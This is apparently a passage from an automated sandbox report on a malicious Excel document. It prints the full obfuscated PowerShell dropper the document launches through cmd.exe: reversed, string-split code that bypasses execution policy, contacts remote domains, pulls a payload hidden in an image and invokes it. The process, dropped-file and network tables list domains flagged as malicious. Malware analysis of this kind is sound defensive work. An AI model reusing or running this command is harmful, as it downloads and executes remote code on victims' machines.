Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(^&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(^&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA '+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(^&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( ^& "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%"C:\Windows\system32\cmd.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2252CMd.exe /C "set uEo=$k4r5 = " ))93]RahC[]GnIRtS[,)88]RahC[+96]RahC[+99]RahC[((EcalPER.)'))43]rAhc[,XEcRpiXEc ECalPERc-93]rAhc[,)09]rAhc[+96]rAhc[+35]rAhc[( ECaLpEr- 69]rAhc[,XEcIfQXEc'+'EC'+'alPERc- 63]rAhc'+'[,'+'XEcAwJXEcECalPERc-421]rAhc[,)65]rAhc[+701]rAhc[+601]rAhc[( ECalPERc-)XEc))]4394..XEc+XEc0[}o{AwJ(gniRTsTeG.8ftu::]gnidocnE.'+'txeT.metsyS[()ZE5mMZE5,ZE5uZE5f-XEc+XEc Rpi}XEc+XEc0{}1{RpXEc+XEci(.;)(raELc.}rOIfQRIfQXEc+XEcRE{'+'Aw'+'J;)ZE5jMZE5(.;}}))51XEc+XEc dnab- G.}P{AwJ(rob-'+')61*)51dnab-B.}P{AwJ((RoXEc+XEcolF::]htam[(=]}x{AwJ+064XEc+XEc*}_{AwJ[}o{AwJ;)}_{AwJ,}XEc+XEcx{AwJ(lEXiPXEc+XEctEg.}g{A'+'wJ=}P{AwJ{)XEc+XEc)954..0(ni XEc+XEc}X{AwJ(hcaerof{)ZE5%ZE5(.8kj)01..0(;0605 )ZE5etZE5,ZE5yBZEXEc+XEc5,ZE5][ZE5 fXEc+XEc- Rpi}0{}2{}1{Rpi( )ZE5aZE5(&=}oXEc+XEc{AXEc+XEcwJ;}{hctaC}})(Et'+'yBDAeR.}RW{AwJ]rahC[=+}SEIfQr{AwJ{)1(elXEc+XEcihWXEc+XEc{yrT;ZE5Z'+'E5=}seIfQr{AwJ;}tixe{hctaC}))}lRIfQu{AwJ(EkovNi.}XEc+XEcRo{AwJ.}Rw{AwJ()ZE5ySZXEc+XEcE5,ZEXEc+XEc5pamtiB.'+'ZE5,ZE5nZE5,ZE5iwarD.meXEc+XEcZE5,ZE5gZE5,ZE5tsZE5 f-'+' Rpi}4{}1{}3{}2{}'+'0{}5{Rpi( )XEc+XEcZE5aZE5XEc+XEc(&=}gXEc+XEc{AwJ{yrt;)'+'ZE5daeRnepZE5XEc+XEc,ZE5OZE5 f-Rpi}1{}0{R'+'pi(=}RXEc+XEcIfQO{AwJ;)}cW'+'{AwJ )ZE5aZE5(&(=}rw{AwJ;)ZE5jMZE5(.;)ZE5SZ'+'E5,ZE5tsyZEXEc+XEc5,ZE5XEc+XEcaZE5,ZE5gniwZE5XEc+XEc,ZE5rD.meZE5 f-Rpi}1{}2'+'{}0{}3XEc+XEc{}4{Rpi( emaNylbmessA- )ZE5'+'dAZE5,ZE5T-dZE5,ZE5epyZE5 f-Rpi}0{}1{}2{Rpi(.;)ZE5ejbO-'+'weZE5,ZE5NZE5,ZE5tcZE5f- Rpi}0XEc+XEc{}2{}1{Rpi( )ZE5aZE5( )ZE5asZE5,ZE'+'5lZE5f- RpiXEc+XEc}0{}1{RpXEc+X'+'Eci(.;)ZE5dZE5,ZE5miZE5,ZXEc+XEcE531/moc.xoZE5,ZE5bgZE5,ZE5mi//ZE5,ZE5/ZE5,ZE5_RW0Q9aZE5,ZE5u/ZE5,ZE5np.oZE5,ZE5aZE5,ZE56bZXEc+XEcE5,ZE5gZE5,ZE5.2segZE5,ZE5:spZE5 f-RpiXEc+XEc}2{}5{}7{}31{}6{}3{}8{}11{}01{}2XEc+XEc1{}'+'1{}4{}9{}'+'0{Rpi(+}OIfQr{AwJ+}Or{AwJ+RpihRpi=}LRIfQu{AwJ;)ZE5tneZE5,ZXEc'+'+XEcE5eW.teNZE5,ZE5iZXEc+XEcE5,ZE5lCbZE5f-Rpi}3{}1{}0{}2{Rpi(=}CW{AwJ;})ZE5ZE5 niXEc+XEcoJ-XEc+XEc }qD{AwJ( )ZE5IZE5,ZXEc+XEcE5xeZE5 f- RpXEc'+'+XEci}0XEc+XEc'+'{}1{Rpi(&;}))6XEc+XEc1,}_{AwJ(61tnIoT::]trevnoC.metsy'+'S[(]rahc[{)ZE5%ZE5(. 8kj)s'+'EiRtNeyTPmeevOMEr::]snoitpO'+'tilpS'+'gnirtS.metsyS[,Rpi8kjRpi(tILpSXEc+XEc.}IiIfQIS{AwJ = }QIfQXEc+XEcd{AwJ;}R'+'pi8kjRpi+))Rpi8kjRpXEc+XEci,2(TresnI.}QAIfQb{AwJ(=+}IIIfQIs{AwJ;}}qXEc+XEcAIfQB{AwJ+Rpi0RXEc+'+'XEcpi= }qAIfQb'+'XEc+XEc{AwJ{)4 tl- HtXEc+XEcGNeL.}qAIfQB{AwXEc+XEcJ(fi;)61,}EdIfQoXEc+XEccIIfQNU{AwJ('+'gnIrtsOt::]trevnoC.'+'metsyS[ = }qAI'+'fQXEc+XEcB{AwJ{)}FIfQb{Aw'+'J ni XEc+X'+'E'+'c}e'+'DOIfQCIfQiNu{AwJ(hcaerof;RpiRpi=}XEc+XEciIIIfQs'+'{AwJ;}}_{AwJ]rahc[]46tni[XEc+XEc{)ZE5%XEc+XEcZE5(. 8kj)(YarrAXEc+XEcRAhCO'+'T.}GG'+'IfQG{AwJ = }FIfQb{AwJ{)XEc+XEc}GgIXEc+XEcfQG{AwJ('+' UmIfQM noitcnuf;]1[))'+'(eA::]ae[(=}oR{AwJ;RXEc+XEcpi}};emaN.erutluCtnerruCXEc+XEc.ofnIerut'+'luC.noitazilabolXEc+XEcG.metsyS n'+'ruter{)(ea gnirts citats cilbup{ ae ssalc c'+'ilbup;metsyS gnisuRXEc+XEcpi fedepyt- )ZE5epZE5,ZE5ddAZE5,ZE5yT-ZE5 f- Rpi}2{}0{}1{Rpi(.;)ZE5jMZE5(.;}}7 s- )ZE5atSZE5,Z'+'E5-tZE5,ZE5rZE5,ZE5peelSZE5f-XEc+XEcRpi}0{}2{}1{}3{Rpi(&;)(ESNOPSErTeG.}yIfQr{AwJ = }AIfQr{AwJ;XEc+XEc)ZE5HZ'+'E5,ZE5DAEZE5 f- Rpi}0{}1{Rpi( = DOh'+'teM.}YXEc'+'+XEcIfQR{AwJ;)}XIfQz{AwXEc+XEcJ+)ZE5ptZE5,ZEXEc+XEc5thZE5,ZE5//:ZE5 f-Rpi}0{}2{}1{Rpi((ETAErC::XEc+XEc]'+'tseuqeRbeW.teN.metsy'+'S['+' = }YIfQr{XEc+XEcAwJ;)ZE5.ZE5,ZE5mocZE5XEc+XEc f- Rpi}0{}1{Rpi(+)4 )ZE5vZE5,ZE5v'+'aZE5 f'+'-XEc+XEcR'+'pi}1{}0{Rpi(.(XEc+X'+'Ec=}xZ{AwJ{ )++}i{AwJ ;1 tlXEc+XEc- XEc+XEc}I{AwJ XEc+XEc;0 =XEc+XEc }i{AwJ( rof{ jm noitcnuf;}}hTIfQGnEl{AwJ }la{AwJ )ZE5GZE5,ZE5EeZE5XEc+XE'+'cf'+'-Rpi}0{}1{Rpi(&;)Z'+'E5mlkjihgfedcbaZE5,ZE5xZEXEc+XEc5,ZE5zyZE5,ZE5srqpZE5,ZE5wv'+'utZE5,ZE5onZE5f- XEc+'+'XEcRpi}3{}4{}1{}2{}0{}5{Rpi( = }lIfQa{AwJ;)1 ='+' }HTg'+'NEIfQL{AwJ]tni[( marap{ vVIfQA '+'noitcnuf;)ZE5neliSZE5,ZE5oC'+'ZE5,ZE5yltZE5,ZE5euZE5,ZE5nitnZEXEc+XEc5'+' f- Rpi}1{}0XEc+XEc{}3{}2{}4'+'{Rpi( = }eCneIfQrEIfQFerpnoiIfQTCIfQARORRE{AwJ;}'+'ZE5ZE5 nioj- )}])}XAIfQm{AwJ mumix'+'aM- 0'+' muminiM- )ZE5moZE5,ZE5aR-teZE5,ZE5GZE5,ZE5dnZE5 f-Rpi}3{}0{}2{}1{Rpi(&([}tSIIf'+'Ql{AwXEc+XEcJ{)++}i{AwJ ;}hTgIfQNeIfQL{AwJ tl- }IXEc+XEc{AwJ ;0 = }I{AwJ( rof(AwJ'+';H'+'TgNEl.}tSIIfQl{AwJ XEc+XEc= }XAIfQXEc+XEcM{AwJ)1 = }HTIfQGIfQNEL{AwJ]tni[,}XEc+'+'XEcTSIfQIl{AwJ( marap{ EeXEc+XEcIfQG noitcnufXEc(( ()XEcXEcNioJ-]2,11,3[emAn.)XEc*RDM*XEc ELbAiRAV(( .'( ( )'X'+]43[emOHSp$+]12[emOhSp$ ( & "; ^& ((GV '*mdr*').NAMe[3,11,2]-JoIn'')( (Ls variABlE:k4R5 ).vAlue[ -1 ..- ( (Ls variABlE:k4R5 ).vAlue.lEngTh )]-JOIn '' ) &&SeT TRS=PoWERShell -NOPRoFI -w 1 -EXEcuTiOnP BYPass -nOniNterAcTi sV s3zxl5 ( [typE]( \"{1}{0}{2}\" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va )::(\"{1}{0}{3}{4}{2}\"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'uEO',( \"{2}{1}{0}\" -f 'S','ocES','pR' )) ) ^^^|. ( ${e`Nv:c`oM`sPEC}[4,26,25]-JOin'' )&& CMd /C %trs%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2508CMd /C %trs%C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 073
Read events
912
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
2952EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR68A.tmp.cvr
MD5:
SHA256:
3472powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6Z6P6DFVME4XUN2NIB13.temp
MD5:
SHA256:
2848csc.exeC:\Users\admin\AppData\Local\Temp\CSC6677.tmp
MD5:
SHA256:
2848csc.exeC:\Users\admin\AppData\Local\Temp\lcupnu2x.pdb
MD5:
SHA256:
476cvtres.exeC:\Users\admin\AppData\Local\Temp\RES6678.tmp
MD5:
SHA256:
2848csc.exeC:\Users\admin\AppData\Local\Temp\lcupnu2x.dll
MD5:
SHA256:
2848csc.exeC:\Users\admin\AppData\Local\Temp\lcupnu2x.out
MD5:
SHA256:
2592powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GXHUQU2947QA1VFUVTNG.temp
MD5:
SHA256:
2196csc.exeC:\Users\admin\AppData\Local\Temp\CSCBC77.tmp
MD5:
SHA256:
2196csc.exeC:\Users\admin\AppData\Local\Temp\hfg87rxe.pdb
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3472
powershell.exe
HEAD
403
47.91.75.201:80
http://kkrr.com/
US
unknown
3472
powershell.exe
HEAD
301
195.149.84.100:80
http://uvda.com/
GB
malicious
2592
powershell.exe
HEAD
200
203.78.142.12:80
http://nzav.com/
HK
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3472
powershell.exe
47.91.75.201:80
kkrr.com
Alibaba (China) Technology Co., Ltd.
US
unknown
3472
powershell.exe
195.149.84.100:443
uvda.com
World News PTE. LTD
GB
malicious
3472
powershell.exe
195.149.84.100:80
uvda.com
World News PTE. LTD
GB
malicious
2592
powershell.exe
203.78.142.12:80
nzav.com
LinkChina Telecom Global Limited.
HK
malicious

DNS requests

Domain
IP
Reputation
kkrr.com
  • 47.91.75.201
unknown
uvda.com
  • 195.149.84.100
  • 195.149.84.101
malicious
hztt.com
unknown
nzav.com
  • 203.78.142.12
unknown

Threats

No threats detected
Process
Message
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR originated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
csc.exe
*** HR propagated: -2147024774 *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144